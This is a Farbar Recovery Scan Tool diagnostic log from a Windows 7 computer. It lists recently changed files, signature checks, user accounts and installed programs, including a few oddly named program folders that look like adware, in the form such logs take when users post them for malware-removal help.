2015-12-23 02:20 - 2015-11-20 19:34 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2015-12-23 02:20 - 2015-11-20 19:33 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-12-23 02:20 - 2015-11-11 22:12 - 00387792 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-12-23 02:20 - 2015-11-11 21:52 - 00341192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-12-23 02:20 - 2015-11-11 19:53 - 01735680 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2015-12-23 02:20 - 2015-11-11 19:53 - 00525312 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2015-12-23 02:20 - 2015-11-11 19:39 - 01242624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2015-12-23 02:20 - 2015-11-11 19:39 - 00487936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2015-12-23 02:20 - 2015-11-11 17:00 - 12856832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-12-23 02:20 - 2015-11-11 16:44 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-12-23 02:20 - 2015-11-11 16:44 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-12-23 02:20 - 2015-11-11 16:41 - 20366848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-12-23 02:20 - 2015-11-11 15:57 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01008640 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2015-12-23 02:20 - 2015-11-10 19:39 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-12-23 02:20 - 2015-11-10 19:37 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2015-12-23 02:20 - 2015-11-10 18:47 - 03211264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-12-23 02:20 - 2015-11-10 01:13 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-12-23 02:20 - 2015-11-10 01:13 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-12-23 02:20 - 2015-11-10 01:12 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-12-23 02:20 - 2015-11-10 01:11 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-12-23 02:20 - 2015-11-10 01:08 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-12-23 02:20 - 2015-11-10 01:06 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-12-23 02:20 - 2015-11-10 01:06 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-12-23 02:20 - 2015-11-10 01:04 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-12-23 02:20 - 2015-11-10 01:02 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-12-23 02:20 - 2015-11-10 01:02 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-12-23 02:20 - 2015-11-10 00:50 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-12-23 02:20 - 2015-11-10 00:44 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2015-12-23 02:20 - 2015-11-10 00:36 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-12-23 02:20 - 2015-11-10 00:36 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-12-23 02:20 - 2015-11-10 00:14 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-12-23 02:20 - 2015-11-10 00:12 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-12-23 02:20 - 2015-11-08 23:33 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-12-23 02:20 - 2015-11-08 23:32 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-12-23 02:20 - 2015-11-08 23:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-12-23 02:20 - 2015-11-08 23:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-12-23 02:20 - 2015-11-08 23:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-12-23 02:20 - 2015-11-08 23:01 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-12-23 02:20 - 2015-11-08 22:52 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-12-23 02:20 - 2015-11-08 22:40 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-12-23 02:20 - 2015-11-08 22:32 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-12-23 02:20 - 2015-11-08 22:29 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2015-12-23 02:20 - 2015-11-08 22:15 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-12-23 02:20 - 2015-11-08 22:15 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-12-23 02:20 - 2015-11-08 21:41 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-12-23 02:20 - 2015-11-05 20:05 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\wshrm.dll
2015-12-23 02:20 - 2015-11-05 20:02 - 00014848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshrm.dll
2015-12-23 02:20 - 2015-11-05 20:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2015-12-23 02:20 - 2015-11-05 20:00 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2015-12-23 02:20 - 2015-11-05 10:53 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2015-12-23 02:20 - 2015-11-03 20:04 - 00802304 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2015-12-23 02:20 - 2015-11-03 19:56 - 00627712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2015-12-23 02:19 - 2015-11-11 17:21 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-12-23 02:19 - 2015-11-11 16:12 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-12-23 02:19 - 2015-11-10 01:24 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-12-23 02:19 - 2015-11-10 01:12 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-12-23 02:19 - 2015-11-10 01:03 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-12-23 02:19 - 2015-11-10 00:47 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-12-23 02:19 - 2015-11-10 00:46 - 04514816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-12-23 02:19 - 2015-11-10 00:37 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2015-12-23 02:19 - 2015-11-10 00:35 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-12-23 02:19 - 2015-11-10 00:17 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-12-23 02:19 - 2015-11-08 23:16 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-12-23 02:19 - 2015-11-08 23:15 - 00571392 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-12-23 02:19 - 2015-11-08 23:15 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-12-23 02:19 - 2015-11-08 23:14 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-12-23 02:19 - 2015-11-08 23:07 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-12-23 02:19 - 2015-11-08 23:04 - 05923840 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-12-23 02:19 - 2015-11-08 23:02 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-12-23 02:19 - 2015-11-08 22:48 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-12-23 02:19 - 2015-11-08 22:35 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-12-23 02:19 - 2015-11-08 22:18 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2015-12-23 02:19 - 2015-11-08 22:14 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-12-23 02:19 - 2015-11-08 22:14 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-12-23 02:19 - 2015-11-08 22:13 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-12-23 02:19 - 2015-11-08 21:53 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-12-23 02:19 - 2015-11-08 21:30 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-12-23 02:18 - 2015-11-03 20:04 - 00241664 _____ (Microsoft Corporation) C:\Windows\system32\els.dll
2015-12-23 02:18 - 2015-11-03 19:55 - 00179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\els.dll
2015-12-23 02:13 - 2015-12-23 02:13 - 00019320 _____ C:\Windows\System32\Tasks\{6D9AE6C4-E019-018C-C9B4-9E2714B48E10}
2015-12-07 03:52 - 2015-12-07 03:52 - 00000000 ____D C:\ProgramData\{08a2d2e5-4064-0}
2015-12-07 03:52 - 2015-12-07 03:52 - 00000000 ____D C:\ProgramData\{07fc38b7-3064-1}

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-12-26 15:42 - 2014-05-20 22:58 - 00000992 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-12-26 15:33 - 2014-09-26 23:46 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Spotify
2015-12-26 15:30 - 2014-06-02 00:55 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-26 14:17 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-12-26 14:17 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-12-26 14:09 - 2009-07-14 10:16 - 00495838 _____ C:\Windows\system32\perfh014.dat
2015-12-26 14:09 - 2009-07-14 10:16 - 00096254 _____ C:\Windows\system32\perfc014.dat
2015-12-26 14:09 - 2009-07-14 06:13 - 01365432 _____ C:\Windows\system32\PerfStringBackup.INI
2015-12-26 14:09 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2015-12-26 14:03 - 2014-05-20 22:58 - 00000988 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-12-26 14:02 - 2014-09-26 23:47 - 00000000 ____D C:\Users\Simon\AppData\Local\Spotify
2015-12-26 14:02 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-26 02:46 - 2015-04-14 02:10 - 00000000 ____D C:\Users\Simon\AppData\Local\Steam
2015-12-26 02:40 - 2014-05-21 05:03 - 00000000 ____D C:\Users\Simon\AppData\Local\CrashDumps
2015-12-26 02:14 - 2014-05-20 19:16 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-12-26 02:11 - 2015-05-30 13:19 - 00000000 _____ C:\Users\Simon\AppData\Local\Driver_LOM_8161Present.flag
2015-12-26 02:11 - 2014-05-20 19:54 - 00000000 ____D C:\ProgramData\Downloaded Installations
2015-12-26 02:06 - 2009-07-14 04:20 - 00000000 ____D C:\Windows
2015-12-26 01:31 - 2015-07-03 00:53 - 00000000 ____D C:\Users\Simon\Desktop\cfg
2015-12-25 23:22 - 2015-06-12 18:39 - 00000000 ____D C:\Users\Simon\AppData\Local\Adobe
2015-12-25 22:11 - 2015-04-19 23:32 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieBrowserModeList
2015-12-25 22:11 - 2014-06-17 17:59 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieUserList
2015-12-25 22:11 - 2014-06-17 17:59 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieSiteList
2015-12-25 22:00 - 2009-07-14 03:34 - 00000215 _____ C:\Windows\system.ini
2015-12-25 22:00 - 2009-07-14 03:34 - 00000027 _____ C:\Windows\system32\Drivers\etc\hosts.old
2015-12-25 21:47 - 2014-05-20 22:59 - 00002177 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-12-25 21:37 - 2014-05-20 22:58 - 00003988 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-12-25 21:37 - 2014-05-20 22:58 - 00003736 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-12-25 21:33 - 2015-03-29 22:17 - 00000000 ____D C:\Program Files (x86)\Chime
2015-12-25 21:33 - 2015-01-28 23:35 - 00000000 ____D C:\Program Files (x86)\nicEdeeall
2015-12-25 21:33 - 2015-01-28 23:34 - 00000000 ____D C:\Program Files (x86)\UpDown page without arrows
2015-12-25 21:33 - 2015-01-28 23:34 - 00000000 ____D C:\Program Files (x86)\nicedeial
2015-12-25 21:17 - 2015-05-17 00:39 - 00000000 ____D C:\Users\Simon\AppData\Local\SteelSeries Engine 3 Client
2015-12-25 21:17 - 2014-05-21 05:16 - 00000000 ____D C:\Users\Simon\AppData\Local\SteelSeries_ApS
2015-12-25 21:17 - 2014-05-21 05:15 - 00000000 ____D C:\Users\Simon\AppData\Roaming\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:12 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:12 - 00000000 ____D C:\ProgramData\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:09 - 00000000 ____D C:\Program Files\SteelSeries
2015-12-25 21:17 - 2009-07-14 06:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-12-25 21:16 - 2014-10-07 19:03 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Equalify
2015-12-25 21:15 - 2014-05-29 18:59 - 00000000 ____D C:\Users\Simon\AppData\Roaming\uTorrent
2015-12-25 21:02 - 2015-07-03 21:25 - 00072415 _____ C:\Users\Simon\Desktop\cfg.rar
2015-12-25 20:45 - 2009-07-14 05:45 - 04951560 _____ C:\Windows\system32\FNTCACHE.DAT
2015-12-25 20:42 - 2015-04-14 12:16 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-12-25 20:42 - 2015-04-14 12:16 - 00000000 ___SD C:\Windows\system32\GWX
2015-12-23 03:13 - 2014-05-20 19:25 - 01341938 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2015-12-23 03:06 - 2014-05-20 21:51 - 00000000 ____D C:\Windows\system32\MRT
2015-12-23 03:02 - 2014-05-20 21:51 - 140158008 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-12-07 03:29 - 2014-12-24 22:10 - 00000000 ____D C:\Windows\system32\appraiser
2015-12-07 03:29 - 2014-05-21 14:11 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-12-07 03:29 - 2009-07-14 10:54 - 00000000 ____D C:\Program Files\Windows Journal
2015-12-02 13:18 - 2014-05-23 16:14 - 00301728 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

==================== Files in the root of some directories =======

2014-09-06 19:36 - 2014-09-06 19:36 - 1177208 _____ () C:\Users\Simon\AppData\Roaming\AndyCleanupTool.exe
2014-09-06 19:36 - 2014-09-06 19:36 - 1176696 _____ () C:\Users\Simon\AppData\Roaming\AndyCleanVM.exe
2014-12-02 19:05 - 2015-06-29 19:41 - 0001456 _____ () C:\Users\Simon\AppData\Local\Adobe Save for Web 13.0 Prefs
2015-05-30 13:19 - 2015-12-26 02:11 - 0000000 _____ () C:\Users\Simon\AppData\Local\Driver_LOM_8161Present.flag
2015-05-18 15:37 - 2015-05-18 15:37 - 0007597 _____ () C:\Users\Simon\AppData\Local\Resmon.ResmonCfg
2015-04-13 22:45 - 2015-04-14 02:01 - 0011710 _____ () C:\Users\Simon\AppData\Local\Temp-log.txt

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-12-25 22:58

==================== End of FRST.txt ============================

Addition:

Additional scan result of Farbar Recovery Scan Tool (x64) Version:25-12-2015
Ran by Simon (2015-12-26 15:58:13)
Running from C:\Users\Simon\Downloads
Windows 7 Professional Service Pack 1 (X64) (2014-05-20 18:13:56)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1743091598-2114630970-4208458173-500 - Administrator - Disabled)
Gjest (S-1-5-21-1743091598-2114630970-4208458173-501 - Limited - Disabled)
Simon (S-1-5-21-1743091598-2114630970-4208458173-1000 - Administrator - Enabled) => C:\Users\Simon

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.1.418 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated)
Adobe Illustrator CC (HKLM-x32\...\{F2321021-08A2-44D6-B1DF-BDB415F23EC3}) (Version: 17.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\Adobe Photoshop CS6) (Version: 13.0.0.0 - © The Computer Guy Tony)
Adobe Premiere Pro CC 2014 (HKLM-x32\...\{07BE616F-9E42-4C90-AF4F-0F32A5B088E7}) (Version: 8.0.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.11) - Norsk (HKLM-x32\...\{AC76BA86-7AD7-1044-7B44-AB0000000001}) (Version: 11.0.11 - Adobe Systems Incorporated)
Bandicam (HKLM-x32\...\Bandicam) (Version: 2.1.0.708 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Box Edit (HKLM-x32\...\{145BEAC3-F9E4-432B-AFD3-D36216C4C355}) (Version: 3.0.24.493 - Box)
CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
ETDWare PS/2-X64 11.13.6.2_WHQL (HKLM\...\Elantech) (Version: 11.13.6.2 - ELAN Microelectronic Corp.)
Fotogalleri (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Gyazo 3.1.6 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version:  - Nota Inc.)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3412 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.3.34 - Intel Corporation)
Intel® PROSet/Wireless-programvare (HKLM-x32\...\{105fa5c4-72e1-41f2-a82c-884d8aa4b381}) (Version: 16.6.0 - Intel Corporation)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.670 - Oracle)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
K-Lite Codec Pack 10.6.5 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.6.5 - )
Malwarebytes Anti-Malware versjon 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 43.0.2 (x86 nb-NO) (HKLM-x32\...\Mozilla Firefox 43.0.2 (x86 nb-NO)) (Version: 43.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.2 - Mozilla)
MSI Afterburner 4.1.0 (HKLM-x32\...\Afterburner) (Version: 4.1.0 - MSI Co., LTD)
MSI Fast Boot (HKLM-x32\...\{0F212E7A-65EB-4668-A8D7-749026A64F8E}_is1) (Version: 1.0.1.8 - MSI)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.9 - Notepad++ Team)
NVIDIA GeForce Experience 2.2.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.2.2 - NVIDIA Corporation)
NVIDIA Grafikkdriver 347.25 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 347.25 - NVIDIA Corporation)
NVIDIA PhysX systemprogramvare 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation)
OpenOffice 4.1.1 (HKLM-x32\...\{FBEB2D26-74E6-4DEE-B6CE-0EB3B92DE777}) (Version: 4.11.9775 - Apache Software Foundation)
Oracle VM VirtualBox 4.3.12 (HKLM\...\{B5121457-0126-4E62-BCBF-6DC7C73D9E4A}) (Version: 4.3.12 - Oracle Corporation)
PDF Settings CC (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
Qualcomm Atheros Bandwidth Control Filter Driver (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Network Manager (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.42.1045 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.21249 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7179 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5}) (Version: 1.00.0235 - REALTEK Semiconductor Corp.)
SHIELD Streaming (Version: 4.0.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 17.12.8 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
